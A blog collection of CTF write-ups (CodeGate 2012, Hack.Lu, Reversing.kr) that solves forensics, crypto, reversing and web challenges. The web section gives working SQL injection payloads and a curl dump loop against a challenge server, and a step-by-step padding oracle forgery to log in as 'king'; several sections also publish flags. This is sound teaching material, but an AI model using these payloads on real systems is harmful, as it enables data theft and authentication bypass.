Thursday, May 30, 2013

CodeGate CTF 2012 : Misc - 300 Points

CodeGate CTF 2012 : Misc - 300 Points


Puzzle given to us:
A PCAP file is given to us. Find the key to a locked pdf file inside the pdf file.
File:56C5A2B69084AEC379406CEB42CEC70C

Recommended Tools:
http://pdfcrack.sourceforge.net/
jnetpcap API
wireshark
notepad++
netbeans

Analysing the File:
Analyzing the pcap file using wireshark will eventually leads you to realize that there are 3 pdf files in it. You may use tcp contains pdf to filter out the packets and then follow tcp stream to trace the packets flow. Next I save the data into a file and open up using notepad++. I then prune the useless data leaving only the pdf binary. Next I save the data as a pdf file.

Solving the puzzle:
After extracting the 3 pdf files from the pcap file. You will realize that 1 of them has a password on it.

There are few ways to go about breaking the password in such a short time frame

  1. The password is in the pcap file hidden in one of the messages
  2. The password is in the other 2 pdf files
  3. The password is a common password that is brute forceable

The best bet is to try point 3 first. We begin by running a script/program that parses packet messages into text and string tokenize them into words. These words are formed into a dictionary and passed to a pdf password cracking program to enumerate the keys and attempt to open the file. I downloaded pdf cracker and used it in a VM environment for this puzzle.

I wrote a java app in under 15 mins by grabbing online examples here and there to form this ugly duck... U may choose to rewrite it or wait for a while more for me to rewrite a proper program

import java.util.Date;
import java.util.StringTokenizer;
import java.io.*;
import org.jnetpcap.Pcap;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.packet.PcapPacketHandler;
import com.gargoylesoftware.htmlunit.StringWebResponse.*;
import com.gargoylesoftware.htmlunit.*;
import com.gargoylesoftware.htmlunit.html.* ;
import java.net.URL;

public class PCap {
  public static void main(String[] args) {
    final StringBuilder errbuf = new StringBuilder(); // For any error msgs
    final String file = "300.pcap";

    try {
      System.out.printf("Opening file for reading: %s%n", file);
      Pcap pcap = Pcap.openOffline(file, errbuf);
      if (pcap == null) {
        System.err.printf("Error while opening device for capture: "+ errbuf.toString());
        return;
      }

      PcapPacketHandler<string> jpacketHandler = new PcapPacketHandler<string>() {
      FileWriter fstream = new FileWriter("out.dic");
      BufferedWriter out = new BufferedWriter(fstream);
      public void nextPacket(PcapPacket packet, String user) {
      try {
        System.out.printf("Received at %s caplen=%-4d len=%-4d %s\n",new Date(packet.getCaptureHeader().timestampInMillis()),packet.getCaptureHeader().caplen(), // Length actually captured
        packet.getCaptureHeader().wirelen(), // Original length
        user // User supplied object
      )
      // convert html into text using htmlunit. I don't want html tags!
      String s = packet.getUTF8String(0, packet.getTotalSize());
      URL url = new URL("http://www.example.com");
      StringWebResponse response = new StringWebResponse(s, url);
      WebClient client = new WebClient() ;
      HtmlPage page = HTMLParser.parseHtml(response, client.getCurrentWindow());
      String data = page.asText();
      StringTokenizer st = new StringTokenizer(data);
      while (st.hasMoreTokens()) {
        String token = st.nextToken();
        boolean err = false;
        for (int i = 0; i &lt; token.length(); i++) {// i only want normal ascii
          if (token.charAt(i) &lt; 32 || token.charAt(i) &gt; 126) {
            err = true;
            break;
          }
        }
        if(!err)
          out.write(token + "\n");
      }
    }catch (Exception ex) {
    }
  }
}
try {
  pcap.loop(Pcap.LOOP_INFINITE, jpacketHandler, "jNetPcap rocks =D!");
} finally {
pcap.close();
}
} catch (Exception ex) {
}
}
}

After 9000+ attempts the password to the locked file is found! woohoo... the answer to the locked file is 28-letter
Final answer: 23FB0EC48DF3EACABCA9E98E8CA24CD1 after strupr(md5('28-letter'))
Ok someone told me a 1 line solution >_<
in mac os terminal type this command strings 300.pcap | tr ' ' '\n' > 300_strings.dic
ok me noob >_<

cheers
Elucidator

CodeGate Qualifiers CTF 2012 : Misc #4 - 300 Points

CodeGate Qualifiers CTF 2012 : Misc #4 - 300 Points

Given Hints:
This is the original file:
File:Codegate_site.zip

Recommended Tool:
Online JavaScript Beautifier (http://jsbeautifier.org/) - Beautify, unpack or deobfuscate JavaScript

Identifying File:
For this challenge, we are provided with only a zipped file and it contains several other files for codegate homepage. Opening up the index page (codegate_homepage.htm) in a browser does not show anything interesting. However we discover something peculiar as we look at the source code:
Line 247: <script>c(' … ');</script>
At line 247 of codegate_homepage.htm, a very long statement containing ~11k whitespaces stands out from the rest of the code. This is clearly a very important lead that directs us to look for the function c within the javascript file (codegate.js).
At line 231 of codegate.js lies the obfuscated code for function c. Deobfuscating the code reveals the following:
function c(_0x272dx2) {
    _0x272dx2 = _0x272dx2['replace'](/ /g, 1);
    _0x272dx2 = _0x272dx2['replace'](/\t/g, 0);
    var _0x272dx3 = _0x272dx2;
    _0x272dx2 = "";
    for (i = 0; i &lt; _0x272dx3['length']; i++) {
        _0x272dx2 = _0x272dx3['substring'](i, i + 1) + _0x272dx2
    };
    var _0x272dx4 = "";
    for (i = 0; i &lt; _0x272dx2['length']; i += 9) {
        _0x272dx4 += String['fromCharCode'](parseInt(_0x272dx2['substring'](i, i + 9), 2))
    };
    eval(_0x272dx4)
};

What the code does is to replace all whitespaces with digit 1 and all tabs with digit 0. We can pass the variable _0x272dx4 to the alert function to see the code that is passed to the eval function:
if (new Date().getTime() > 1330268400000) {
    var dummya = '1';
    var dummyb = '1';
    var dummyv = '1';
    var dummyc = '1';
    var dummys = '1';
    var dummyae = '1';
    var dummyasefa = '1';
    var dummeya = '1';
    var dummya = '1';
    var dum3mya = '1';
    var dumm54ya = '1';
    var dumm3ya = '1';
    var dum1mya = '1';
    var p = 'YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT';
    p = p.replace(/T/g,//).replace(/P/g,//).replace(/Y/g,//).replace(/K/g,'%');
    //var authkey =     unescape(p);
}
As we can see here, this portion of code does a comparison of the current timestamp against a specified unix timestamp that is equivalent to "Wed, 12 Jul 44124 00:00:00 GMT". Within the if statement lies a series of dummy variables that are assigned to the value '1' but are not used anywhere else. What follows thereafter is the assigment of a string of hexadecimal values to variable p, removing all instances of 'T', 'P' and 'Y' from it, and replacing all instances of 'K' with '%'.

Variable p
----------
Before: YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT
After: %41%48%48%34%6D%52%73%4B%34%4E%47%46%30%72%33%76%33%72
Final Solution:
We obtain the solution to this challenge after passing the variable p to the unescaped function.
Flag: **AHH4mRsK4NGF0r3v3r**

cheers
Mr.D

CodeGate CTF 2012 : Vulnerability - 100 Points

CodeGate CTF 2012 : Vulnerability - 100 Points


Puzzle given to us:
Web application given to us contains

  1. index page
  2. upload page (for uploading of mp3)
  3. player page (for playing of uploaded mp3)
  4. request_mp3 page (for downloading of mp3)

Question: What song is the administrator listening to?

Recommended Tools:
Live HTTP Headers (https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/)
Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)

Analysing the File:
There are 3 vulnerabilities here... but only 1 is useful for this puzzle

  1. Full Path Disclosure via local file inclusion found this in the url where the page is redirect via ?page=upload or ?page=
  2. XSS via inserting script in the title text field in upload page
  3. SQL Injection in the genre filed in upload page

Solving the Puzzle:
The SQL Injection was found through the use of Tamper data while uploading a mp3. By modifying the integer value of the genre from "1" to " 1' " resulted in failure to upload the mp3 file. Although no error appears, but it does seems that there is a sql error. I would image the backend sql code to be something like the following
INSERT INTO xxx (a,b,c,d) VALUES (a,b,genre,title,d)
So my attack begins by changing the genre post value to 1, database())#
yeah the attack works! now the upload page display the uploaded file title to the name of the database

Ok, lets begin our attack... using genre field

Get the table names from the database. It is noted that there are tons of tables in the database and it is in this order upload_mp3_ip_address
1, (SELECT table_name FROM information_schema.tables where table_schema=database())#

Get the column name from the table (we use hex to by pass single quote problem in the sql statement) the fields dump are idx, genre, title, file
1, (SELECT column_name FROM information_schema.columns where table_name=0xhextablename)#
Dump the fields
1, (SELECT group_concat(title, 0x3a, file) from upload_mp3_127_0_0_1)#
Damn the file field looks empty... or is it? lets try this
1, (SELECT length(file) from upload_mp3_127_0_0_1)#
damn the size is big...
let's write a bash to dump... .
>> for i in `seq 0 32767 393204`; do ./vuln100.sh "SELECT hex(substring(file,$i,32767)) FROM upload_mp3_127_0_0_1" | xxd -r -p - >>vuln100.mp3; done;
vuln100.sh
curl -s "http://1.234.41.8:7856/mp3_world/?page=upload" -F "mp3=@a.mp3;filename=mp3.mp3" -F "genre=2,($1))#" -F "title=a" 2>/dev/null >/dev/null
curl -s "http://1.234.41.8:7856/mp3_world/?page=player" | grep "name:" | awk -F "dance" '{print $2}' | awk -F '",filename' '{ print $1 }' | cut -c 2-
After running the bash script...
a mp3 is formed...
with the solutions in the audio.. UPL04DNPL4D

cheers
Elucidator

CodeGate CTF 2012 : Vulnerability - 400 Points

CodeGate CTF 2012 : Vulnerability - 400 Points


Puzzle given to us:
A Web application is given to us in which it allows us to download a certificate that we can use to upload and login into the system as citizen. The objective is to find a way to login as king.

Recommended Tools:
-

Analysing the File:
Analyzing the downloaded file, it contains only 1 line (btw the below line is "randomized" every time you download from the server)
vDxkdtmGels=KUdOWbuM0mE=

this file seems like 2 x base 64 to me, lets decode it... seems garbish.. hmmm i wonder wth is it...
so let's ignore the garbish ascii for now and we hex the decoded value.

let's then modify the contents by changing the end bytes of the 1st block and encode it back to base64. Submit the cert up... we see a popup: padding error.
Crap its the padding oracle problem as i had suspected =(

Solving the Puzzle:

Padding Oracle has been used in some captcha algorithm. However such approach is vulnerable to attack. We are given 2 things the IV and the crypted message. So i guess the 2 x base64 given to us means this.

The attack begins like this... we do not touch the crypted message rather we modify the IV (initialization vector) so that we are able to decipher what is the intermediate value of this padding oracle problem. Once the intermediate value is deciphered, we would have solved 90% of the puzzle. What we can do now is to xor the intended plaintext with the intermediate value and use it as the IV.

Note: there are few errors that the web application will prompt to us... they are

  • Padding Error = the IV caused the plaintext padding to be malformed. Theoritically, if there are 2 empty space in a block the block should be "a b c d e f 0x02 0x02" the hex 02 indicates how many padded bytes there are. if the IV caused the plain text to be "a b c d e f 0x01 0x02" This will cause padding error.
  • Class Error = this is generated when you change the IV until the web application logic is unable to determine which class you belong to. For instance lets say you are a citizen and somehow you changed one of the byte making it into citazen. This will generate a class Error.


the above is a brief summary of how an attacker would approach this problem. Now for step by step illustration.


  1. Decode base64
  2. Hex it
  3. Generate 256 different last byte
  4. upload to server to test result
  5. only 1 successful login, the rest are all padding error
  6. The plain text last byte is a 0x01 [Reason: if the last byte is 0x02, we should get 2 non padding error]
  7. since we know the plain text (0x01) and we know the IV hex, we can derive the intermediate value by (0x01 ^ IV's last byte)
  8. Now we repeat step 3 to 7 to get the 2nd last byte of the intermediate value but this time we form the IV in such a way that the last byte of the plain text become 0x02
  9. After bruteforcing for 256 times we will only have 1 class error and the rest are padding error... the class error indicates that we found the correct IV for the last 2nd byte to force that plain text into 0x02. We can derive the IV for the 2nd last byte.
  10. the above steps repeats until we get the full intermediate value.


Once we got the intermediate value, we can derive the plain text easily by taking the IM xor with the IV. We found that the plain text is actually nezitic0x01 which stands for citizen and 1 padding. So using my spider sense we can change this plaintext into king followed by 4 padding... which is ...gnik0x040x040x040x04 and xor with the IM to get the IV needed to do the spoofing job. We re encode the data back into base 64 and resubmit the ctf file to the server. =D we are logged in as the king!

My orginal CTF File contents is: vDxkdtmGels=KUdOWbuM0mE=
My edited CTF File contents is: tTd3dKnrHV4=KUdOWbuM0mE=

cheers
Elucidator

CodeGate CTF 2012 : Forensics - 100 Points

CodeGate CTF 2012 : Forensics - 100 Points

I find the challenges for Forensics category are well written and fun.It's good when you're involved in malware and Incident Response.
However, the formatting for the solution(s) is the one that puts me off. Kudos to the organizer.

Hints given to us:
In order to steal financial information of Company X, IU got a job under cover.
She decided to attack CFO's computer, and then insert malicious code to his computer in the way of social engineering.
She figured out that he didn't use to turn off his computer, when he gets off work.
After he leaves the office, she obtains financial data from his computer to search EXCEL file.
By checking installed application program, she can find the information in the file. She lacks the file externally.
In order to remove all traces, she erases malicious code, event logs and recent file list.
The company X has to figure out what information she stole correctly to make an appropriate measure.
These are files attacked from CFO's computer. Find the full path and size of the file which she stole.
On the day, CFO left the office at 14:00. The time is based on Korea Standard Time(UTC +09:00).
Answer: strlwr(md5(full_path|file_size)) ('|' is just a character)
Download : 525321B9CEDAF3C8D35FC9071D5DD237

This is the original file which i have to split into multiple files due to file size restrictions:
File:
525321B9CEDAF3C8D35FC9071D5DD237.7z.001

525321B9CEDAF3C8D35FC9071D5DD237.7z.002

525321B9CEDAF3C8D35FC9071D5DD237.7z.003

525321B9CEDAF3C8D35FC9071D5DD237.7z.004


Recommended Tools:
Windows File Analyzer (http://mitec.cz/wfa.html)
TRiD (http://mark0.net/soft-trid-e.html)

Analysing the File:
Using TriD and it's shown that it's a 7-zip file. So when i extract out the contents, it seems to be the entire "Users" folder for a Windows Vista or Windows 7 user.
As the hints given, our main objective is to grab the EXCEL file. But wait, the hints also mentioned about erasing all traces. So basically i can't do a search for .xls
Ok, maybe the attacker deleted the file but let's see whether the attacker removes it from the "Recent" folder in Office.

As we can see from the image below, there are 2 previous opened excel files, [Top-Secret]_2011_Financial_deals & Carving파일분석



From the 2 excel filenames, most probably it should be the one with "Top-Secret"
Since the objective is to find out the full path and and the file size first. As the file is deleted and we are left with .lnk files.
Let's see what other tool(s) i have in my arsenal here.
I quickly copied out the shortcut, which is .lnk file, and whipped out WFA and i can see the required information in the image below.



Solving the Puzzle:
Using all the gathered information and since the answer had to be
Answer: strlwr(md5(full_path|file_size)) ('|' is just a character)

So if we run the following command in Linux:
echo -n "C:\INSIGHT\Accounting\Confidential\[Top-Secret]_2011_Financial_deals.xlsx|9296" | md5sum

Using the md5 checksum that was returned to us, the key for Forensics 100 is : d3403b2653dbc16bbe1cfce53a417ab1

cheers
0x4a61636f62

Reversing.kr - Easy Crack (100pts)

This writeup had been sitting on my PC for some time.
I think it's probably a good time to release it. :D

You can register and download this file here.
http://reversing.kr/download.php?n=1
Alternatively, here is the mirror of the file.
Easy_CrackMe.zip

Required Tools:
IDA Pro

Initial Analysis:
Let's load this binary up with IDA Pro.


From the above image, we can see the "WinMain" which is calling "DialogFunc".

If we follow to "DialogFunc", we will see that it will call "sub_401080" as shown in the image below.


So let's take a quick look at "sub_401080" and if we practice enough with keygen and crackmes, you will know by now that we should check out GetDlgItemText first.


Further Analysis on the Algorithm:
If we study hard enough, you will see that after the application grabbed the user's input data, it will do a comparison with the 2nd byte as shown here.
cmp byte ptr [esp+5], 61h ; Compare 2nd byte with 0x61.
This means that our 2nd character must be a since 61h means "a" according to http://www.asciitable.com/

Let's move on the 2nd comparison.

As we can see from the image above, it's trying to compare user's 3rd and 4th bytes with "5y"

Now let's move downwards.

Ok, now it's trying to load the 5th bytes until end of user input and comparing byte by byte with "R3versing"

Finally, we saw another comparison. This time round, it's trying to compare the 1st byte with 0x45 which is "E"

Conclusion:
Now let's move back all the newly acquired clues before we are being told whether the input key is valid or not.
E + a + 5y + R3versing == Ea5yR3versing

Now let's enter this key "Ea5yR3versing" and we have successfully solved this binary.

cheers
0x4a61636f62

Third Puzzle on 0x41414141.com

After solving the second challenge, we got an email reply with the following contents.

sweet.

Here's the C source:

int bar(){
    int x = 0xC0FFEE;
    return (x ^ (int)bar) ^ 0x8744EE;
}

int main(){
    int x = 0;
    x = bar("Email is return value of fn in form 0x12345678 zero padded to eight digits");
}

Now here's something a little different:

0x41414141.com/gzip/

good luck!
Visiting the above url, i saw this image.


For this particular puzzle, i've used Cerbero Profiler.
Loading the image into Cerbero Profiler, i'm been informed by Profiler that "1 chunks don't match their CRC. They are highlighted in the format view."
That particular chunk is zTXT and if we read the PNG specifications, it is been compressed.

Cerbero Profiler comes along with many features. Let's do a quick filter on the chunk that we are interested in by selected the hex bytes as shown below.


After that, add the zlib unpack filter to it and press preview and you should see something like the image below.


The returned results is "pngRocks@challenge.0x41414141.com" and that is the email address which we should send to. :D

But for people who are interested in an open-source solution, i've written a small python code here to do that.
pyDeflate.py

cheers
0x4a61636f62

Second Puzzle on 0x41414141.com

After solving the first challenge, we got an email reply with the following contents.

You've got the idea. E-mails don't require a subject or body.

Do those skills extend to a PE?

0x41414141.com/bfab4d3c076ac4059f3c1e680c7a6933/

Visiting the given url, we are given a copy of the .exe
Here is a backup of the binary in case the website disappear forever.
bfab4d3c076ac4059f3c1e680c7a6933.zip

Since it's an .exe let's load it up in OllyDbg and have a quick look.


From the above image, we can see that there is a clue, "Email is return value of fn in form 0x12345678 zero padded to eight digits"

Immediately, there is a function call at address 0x00401000
It is loading "0x0C0FFEE" into eax then xor it with 0x401000 then xor the value with 0x8744EE and the results is "7AB00"

Looking at the hint again, the email had to be padded to eight digits, thus the email address which we should send to is 0x0007AB00@challenge.0x41414141.com


cheers
0x4a61636f62

First Puzzle on 0x41414141.com

Initial Stage:
When we go to 0x41414141.com, we saw something that looks like some disassembly of some binaries as you can see below.

00000000 54 6d 6c 6a 5a 53 42 7a 64 47 46 79 64 43 34 67 |TmljZSBzdGFydC4g|
00000010 49 46 4e 31 63 6d 55 67 61 47 39 77 5a 53 42 35 |IFN1cmUgaG9wZSB5|
00000020 62 33 55 67 64 47 68 70 62 6d 73 67 61 58 51 67 |b3UgdGhpbmsgaXQg|
00000030 64 32 46 7a 49 48 4e 30 64 58 42 70 5a 43 42 7a |d2FzIHN0dXBpZCBz|
00000040 61 57 31 77 62 47 55 75 49 41 6f 4b 55 32 56 75 |aW1wbGUuIAoKU2Vu|
00000050 5a 43 42 68 62 69 42 6c 4c 57 31 68 61 57 77 67 |ZCBhbiBlLW1haWwg|
00000060 64 47 38 67 5a 6d 39 76 51 47 4e 6f 59 57 78 73 |dG8gZm9vQGNoYWxs|
00000070 5a 57 35 6e 5a 53 34 77 65 44 51 78 4e 44 45 30 |ZW5nZS4weDQxNDE0|
00000080 4d 54 51 78 4c 6d 4e 76 62 53 34 67 51 53 42 79 |MTQxLmNvbS4gQSBy|
00000090 5a 58 42 73 65 53 42 33 61 57 78 73 49 47 4a 6c |ZXBseSB3aWxsIGJl|
000000a0 49 48 4e 6c 62 6e 51 67 64 47 38 67 64 47 68 6c |IHNlbnQgdG8gdGhl|
000000b0 49 48 4a 6c 63 47 78 35 4c 58 52 76 49 47 46 6b |IHJlcGx5LXRvIGFk|
000000c0 5a 48 4a 6c 63 33 4d 67 59 32 39 75 64 47 46 70 |ZHJlc3MgY29udGFp|
000000d0 62 6d 6c 75 5a 79 42 30 61 47 55 67 56 56 4a 4d |bmluZyB0aGUgVVJM|
000000e0 49 47 39 6d 49 48 52 6f 5a 53 42 7a 5a 57 4e 76 |IG9mIHRoZSBzZWNv|
000000f0 62 6d 51 67 64 47 46 7a 61 79 34 4b |bmQgdGFzay4K|



contact@0x41414141.com

Further Analysis:
After some further analysis, i've figured out that it's just a base64 encoded string.
So i've extracted out the string and got back this.
TmljZSBzdGFydC4g
IFN1cmUgaG9wZSB5
b3UgdGhpbmsgaXQg
d2FzIHN0dXBpZCBz
aW1wbGUuIAoKU2Vu
ZCBhbiBlLW1haWwg
dG8gZm9vQGNoYWxs
ZW5nZS4weDQxNDE0
MTQxLmNvbS4gQSBy
ZXBseSB3aWxsIGJl
IHNlbnQgdG8gdGhl
IHJlcGx5LXRvIGFk
ZHJlc3MgY29udGFp
bmluZyB0aGUgVVJM
IG9mIHRoZSBzZWNv
bmQgdGFzay4K

So i made a simple Python script and i've got back
Nice start. Sure hope you think it was stupid simple.

Send an e-mail to foo@challenge.0x41414141.com. A reply will be sent to the reply-to address containing the URL of the second task.

Sending an email to the above email address and i've got the next challenge awaiting for me. :D

Attached is the simple Python script.
pyBase64Decode.py

cheers
0x4a61636f62

CodeGate Qualifiers CTF 2012 : Misc #2 - 200 Points

CodeGate Qualifiers CTF 2012 : Misc #2 - 200 Points

Given Hints:
Alice wants to send a message to Bob in secure way.

Alice encrypted a plaintext PA = ¡°IMISSYOU¡± = 0x494D495353594F55 by using DES
and obtained ciphertext CA = 0xFA26ED1833264435.

Alice sent the ciphertext CA and the secret key to Bob. The secret key was encrypted
by converting each of its letters to a pair of digits giving its position in the
typewriter keyboard. More precisely, the following table is used.

1 2 3 4 5 6 7 8 9 0
---------------------------------------------------
1 | Q W E R T Y U I O P
2 | A S D F G H J K L
3 | Z X C V B N M

In this manner, 'A' is converted to 21, 'B' to 35, etc. In transmission, all of the
first digits were lost and the received secret key resulted in the pairs:

?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5

After a few minutes, Bob recovered the secret key and smiled. Bob decided to reply in the same way.

Bob encrypts a plaintext PB = 0xB6B2B6ACACA6B0AA by using DES and obtained ciphertext CB = 0x05D912E7CCD9BBCA.

What is the secret key which Bob used? (0x????????????????) (Bob's secret key is different from Alice's secret key)

Identifying File:
We first begin by recovering the secret key. We know these are the possible letters by referencing to the table above:
?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5
------------------------------
I O O R E T O T
K L L F D G L G
V C B B

From the list of possible letters, we can deduce the secret key to be
I L O V E B O B

We confirm this secret key to be correct by testing it out using DES.
Where do we proceed from here? We know the plaintexts PA and PB, the ciphertexts CA and CB and also the secret key SA. How are we going to determine the secret key SB with the information gathered? With some research and thinking, we know:
This CTF session lasts for only 36 hours and several teams manage to solve this challenge within hours.
With the available information, we know we have to conduct a "known plaintext attack", which needs days to brute-force. In view of practicality, this is clearly not the correct direction to head towards solving the challenge.

Let's take another look at the available information:
Plaintext Ciphertext Secret Key
------------------------------------------------------------------------
Alice | 494D495353594F55 FA26ED1833264435 494C4F5645424F42 (ILOVEBOB)
Bob | B6B2B6ACACA6B0AA 05D912E7CCD9BBCA

If we look close enough at the information above, we can make out some noticeable patterns from them => 0x5 in PA becomes 0xA in PB, 0x3 in PA becomes 0xC in PB, 0x2 in CA becomes 0xD in CB, etc. As the list grows, we can actually deduce a trait:
4 -> B 9 -> 6 D -> 2 5 -> A 3 -> C F -> 0
(0100) (1011) (1001) (0110) (1101) (0010) (0101) (1010) (0011) (1100) (1111) (0000)

A -> 5 2 -> D 6 -> 9 E -> 1 1 -> E 8 -> 7
(1010) (0101) (0010) (1101) (0110) (1001) (1110) (0001) (0001) (1110) (1000) (0111)

The common trait among the hex characters is the toggling of bits, which are shown in brackets. For bit manipulation, we can use the exclusive-OR operator (^) to achieve this toggling of bits action.

Let's toggle the bits in the secret key CA to obtain secret key CB and use DES to verify it:
494C4F5645424F42
^FFFFFFFFFFFFFFFF
----------------
B6B3B0A9BABDB0BD

Final Solution:
Flag: **B6B3B0A9BABDB0BD**

cheers
Mr.D

CodeGate CTF 2012 Forensics 400

CodeGate2012 Forensics400

Hints given to us:
In Energy corporate X which is located in Seoul, APT(Advanced Persistent Threat) was occurred.
For 6 months, Attacker A has stolen critical information with an elaborate attack.
Attacker A exerted great effort to remove his all traces such as malicious file, prefetch, registry and event logs for the period of attacking,
so it was hard for Energy Corporate X to find an attacking path.
However IU who is Forensic expert can find the traces of the malicious files Attacker A used by analyzing MFT(Master File Table).
What time malicious file was created? The time is based on Korea Standard Time(UTC +09:00)
Answer: YYYY-MM-DDThh:mm:ss.sTZD
(TZD : +hh:mm or -hh:mm). Calculate down to seven decimal points. (e.g. 2012-02-25T10:20:33.1234567+??:??)
Download : 9327ACF33377C03DAFA46CE98B5DB4D0

This is a mirror of the original file:
9327ACF33377C03DAFA46CE98B5DB4D0.zip

Recommended Tools:
analyzeMFT V1.7 (http://code.google.com/p/opensourceforensics/downloads/detail?name=analyzeMFT-V1-7-x86.exe&can=2&q=)

Analysing the File:
Using TRiD, i know that it's a 7-zip file. So when i extracted out the contents, it's a $MFT file.
Could this be a MFT file?
Further checks on this file proved that it is indeed a MFT file.

Ok, so i used analyzeMFT with this file.
Using the following command, i was able to extract valuable information from the MFT file.
analyzeMFT-V1-7-x86.exe -f $MFT -o forensics400.csv

Since the objective is to find the malicious file which might have been deleted, i did a quick find on "recycle" & ".exe" on the forensics400.csv file.
I've found 2 files in the recycle bin, /$Recycle.Bin/cc.dat and /$Recycle.Bin/r32.exe
As the hint was on a malicious file, maybe i should focus on r32.exe first as shown in the image below.



Solving the Puzzle:
Using all the information that we have gathered thus far, and the hints given
Answer: YYYY-MM-DDThh:mm:ss.sTZD
(TZD : +hh:mm or -hh:mm). Calculate down to seven decimal points. (e.g. 2012-02-25T10:20:33.1234567+??:??)

"2012-02-23T01:39:18.897461" seems like the answer. But wait, it require 7 decimal points. Maybe i should add a 0 behind it
However, using the above key, i got it wrong. After some reading up, it seems like the fault is due to analyzeMFT.
It auto correct the time to my timezone (+8) whereas the challenge require me to be in +9 timezone.
So either i change my system time to +9 or i just add 1 more hr to it.
Being the lazy pig that i am, i chose the latter option.
The correct key that for Forensics 400 is : 2012-02-23T02:39:18.8974610

cheers
0x4a61636f62

CodeGate2012 Forensics300

CodeGate2012 Forensics300

Hints given to us:
IU is investigating the system which was contaminated by malicious code.
As a result of analyzing TimeLine, it seems to be contaminated after February 9th 2012.
Contaminating path would be from visiting Web page. IU analyses various user traces of Internet, however IU can't find malicious URL.
Maybe traces would be removed, when it was contaminated. Find correct malicious URL and the time it was contaminated. (cf. Remove http(s)://)
The time is based on Korea Standard Time(UTC +09:00).

Answer: malicious_URL|YYYY-MM-DDThh:mm:ss
('|' is just a character)

Download : 05D659000025F95CD07B2B36E94B0C15

This is a mirror of the original file:
05D659000025F95CD07B2B36E94B0C15.zip

Recommended Tools:
SQLite Browser (sqlitebrowser.sourceforge.net/)
DCode (http://www.digital-detective.co.uk/freetools/decode.asp)
Any hex viewer / editor or even notepad++

Analysing the File:
When 1 first analyse the file, the returned output from TRiD say it's a 7-zip file. I quickly extracted out the contents. I found out that it's a "cookie" file located deep at \Users\proneer\AppData\Local\Google\Chrome\User Data\Default
This probably mean that it's a SQLite file. Reading the hints given to us and given that it's a SQLite file. With information from the SQLite website, http://sqlite.org/faq.html#q20
It seems that a record can be deleted from the database. It's just that it is not viewable with normal sqlite tools.
So how do we find that data and how do we distinguish it from the non-deleted data? When you delete a record, the space allocated to the record gets added to a free-list.

In other words, the size of the database doesn't get any smaller with record removal, but the space is marked as available for future records.
According to the FAQ in SQLite website, "If SQLITE_SECURE_DELETE is not used and VACUUM has not been run, then some of the deleted content might still be in the database file, in areas marked for reuse."
So attackers, please run vacuum if you really want to delete your entry. :P

Ok, let's open the file in notepad++. Since the objective is to find the malicious url, let's do a quick search on .net .com .org .kr and compare it with all the entries found with SQLite browser.
Once we did that, we did found an extra entry as indicated in the image below, test.wargame.krutma134301300.282793704.1328799447.1328799457.1328799457.10 , that was not found with SQLite browser.



Solving the Puzzle:
But how do we know what is the time? Ok, according to http://www.randycullom.com/chatterbox/archives/2008/10/google_analytic.html


The 3rd set of numbers after utma is the timestamp of the first visit/session for the user.

Using Dcode with 1328799447, we got back Thu, 09 February 2012 23:57:27. +0900 as shown in the image below.



So using all the information that we have gathered thus far, The correct key that for Forensics 300 is : test.wargame.kr|2012-02-09T23:57:27

cheers
0x4a61636f62

Hack.Lu CTF 2010 : Chip Forensic

Hack.Lu CTF 2010 : Chip Forensic


Hints given to us:
Your co-worker has found a suspicious USB device on his desk, but wouldn't dare trying to plug it in:

Instead he removed the case and found some flash memory on the board. After having removed the memory chip and used up all his electrical engineering skills he finally found out what was stored. Now he asks you to find out how to interpret the chip's memory:

0B 12 0F 0F 1C 4A 4C 0D 4D 15 12 0A 08 15
gold: 200 +3 (1st), +2 (2nd), +1 (3rd)


Recommended Tools:
1. Google-Fu - Don't leave home without it.

More Information:
There should be an image showing you the USB device that the co-worker found but as i don't have a copy of it so you can't do a search on Google to check what usb device it is.


After some time googling for the image, i found out that it's a USB keylogger.
So probably the codes could be the scan-codes for a USB keyboard just like how a normal software keylogger in Windows have scan-codes.
Again, let's google to check whether there is a separate scan-codes for USB keyboard.

Using the following search terms, "USB-keyboard scan-codes", the top search hit, http://www.win.tue.nl/~aeb/linux/kbd/scancodes-14.html contained something similar.


Solution:
using the newly acquired information, we got the following information.
0B 12 0F 0F 1C 4A 4C 0D 4D 15 12 0A 08 15
H O L L Y Home Delete J End R O G E R

Result:
JOLLYROGER

Bingo, challenge completed. :D

cheers
0x4a61636f62

Hack.Lu CTF 2010 : Like skies that are so blue

Hack.Lu CTF 2010 : Like skies that are so blue


Hints given to us:
Sometime even pirates have a lazy sunday...

download - Since the original image is missing, i've uploaded a mirror copy of it here.



gold: 100 +3 (1st), +2 (2nd), +1 (3rd)

Recommended Tools:
1. Any photo editor
2. Brains

Logic behind this:
Initially, i wasted too much time trying to get all sort of tools to see whether is it using any steganography in it. I even checked the meta-data and properties of this file but no success.

But after some thoughts, since it's just a 100 points challenge...it should not be too difficult right?

Could it be like those old Defcon challenge that the MD5 of the file is the key?
Bingo, the MD5, 032c49411912397eea2a7d906dab5f7e, of the image file is the answer.

Now that i've accidentally solve this. But there must be something to in the image that give this clue to me.
After spending some more time on it, it seems like if you fill the image with another colour( i used Black this time round as it's default in most image editors).

You will see the following image, which is the essential clue. :P



Solution:
032c49411912397eea2a7d906dab5f7e
Hooray, challenge completed. :D

cheers
0x4a61636f62

Hack.Lu CTF 2011 Space Station 0xA1EA512A

Hack.Lu CTF 2011 : Space Station 0xA1EA512A


Hints given to us:
Space Station 0xA1EA512A

You have seen a deserted space station. Your task is to enter it. The first barrier is the access system. But you can find a module with the application on it. Here is the file:

https://ctf.hack.lu/files/0xA1EA512A.apk

What is the key?

(There is also station B. Station B is the advanced one.)

Here is a copy of the apk file.
0xA1EA512A.zip

Recommended Tools:
1. android emulator (http://developer.android.com/sdk/index.html)

2. dex-translator (http://code.google.com/p/dex2jar/downloads/detail?name=dex-translator-0.0.9.3.zip&can=2&q=) - convert android apps to Java jar file

3. DJ Java Decompiler (http://members.fortunecity.com/neshkov/dj.html) - java decompiler

